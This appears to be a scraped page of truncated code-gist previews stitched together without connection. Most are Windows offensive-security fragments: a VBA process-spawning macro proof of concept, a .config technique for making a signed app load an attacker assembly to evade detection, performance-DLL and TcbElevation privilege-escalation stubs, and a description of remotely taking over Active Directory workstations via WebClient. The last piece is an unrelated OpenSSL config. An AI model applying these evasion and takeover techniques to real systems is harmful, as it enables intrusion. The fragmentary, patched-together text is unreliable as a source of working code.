| ' POC to spawn process with PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON mitigation enabled | |
| ' by @_xpn_ | |
| ' | |
| ' Thanks to https://github.com/itm4n/VBA-RunPE and https://github.com/christophetd/spoofing-office-macro | |
| Const EXTENDED_STARTUPINFO_PRESENT = &H80000 | |
| Const HEAP_ZERO_MEMORY = &H8& | |
| Const SW_HIDE = &H0& | |
| Const MAX_PATH = 260 | |
| Const PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = &H20007 |
We can do this by experimenting with .config files.
Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name
In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly.
We do this by directing the application to read a config file we provide.
| $Global:Listener = [HashTable]::Synchronized(@{}) | |
| $Global:CnQueue = [System.Collections.Queue]::Synchronized((New-Object System.collections.queue)) | |
| $Global:space = [RunSpaceFactory]::CreateRunspace() | |
| $space.Open() | |
| $space.SessionStateProxy.setVariable("CnQueue", $CnQueue) | |
| $space.SessionStateProxy.setVariable("Listener", $Listener) | |
| $Global:newPowerShell = [PowerShell]::Create() | |
| $newPowerShell.Runspace = $space |
| Param( | |
| [Parameter(Mandatory, Position = 0)] | |
| [string]$HostDrive, | |
| [Parameter(Mandatory, Position = 1)] | |
| [string]$LocalDrive | |
| ) | |
| # Script to map a host drive inside a Windows Docker Server Container | |
| # You need to be an admin in the container for this to work. | |
| # Use as .\map_host_drive C: X: |
| #include <iostream> | |
| #include <Windows.h> | |
| #include <Lmcons.h> // UNLEN + GetUserName | |
| #include <tlhelp32.h> // CreateToolhelp32Snapshot() | |
| #include <strsafe.h> | |
| extern "C" __declspec(dllexport) DWORD APIENTRY OpenPerfData(LPWSTR pContext); | |
| extern "C" __declspec(dllexport) DWORD APIENTRY CollectPerfData(LPWSTR pQuery, PVOID* ppData, LPDWORD pcbData, LPDWORD pObjectsReturned); | |
| extern "C" __declspec(dllexport) DWORD APIENTRY ClosePerfData(); |
| #include <iostream> | |
| #include <Windows.h> | |
| #include <Lmcons.h> // UNLEN + GetUserName | |
| #include <tlhelp32.h> // CreateToolhelp32Snapshot() | |
| #include <strsafe.h> | |
| extern "C" __declspec(dllexport) DWORD APIENTRY OpenPerfData(LPWSTR pContext); | |
| extern "C" __declspec(dllexport) DWORD APIENTRY CollectPerfData(LPWSTR pQuery, PVOID* ppData, LPDWORD pcbData, LPDWORD pObjectsReturned); | |
| extern "C" __declspec(dllexport) DWORD APIENTRY ClosePerfData(); |
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
| // TcbElevation - Authors: @splinter_code and @decoder_it | |
| #define SECURITY_WIN32 | |
| #include <windows.h> | |
| #include <sspi.h> | |
| #include <stdio.h> | |
| #pragma comment(lib, "Secur32.lib") | |
| void EnableTcbPrivilege(BOOL enforceCheck); |
This is a minimal /etc/ssl/openssl.cnf supporting legacy algorithms on modern openssl installations
where it is disabled by default.
The marked (######) lines should be added to your openssl.cnf (other parts may be unchanged).
For checking if legacy providers are enabled successfully:
$ openssl list -providers
Providers: